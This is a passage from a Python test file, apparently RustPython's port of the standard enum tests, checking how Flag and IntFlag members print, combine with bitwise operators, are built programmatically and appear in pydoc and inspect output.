self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'Perm.R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'Perm.R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, inconsistent test result on Windows due to threading")
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, inconsistent test result on Windows due to threading")
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
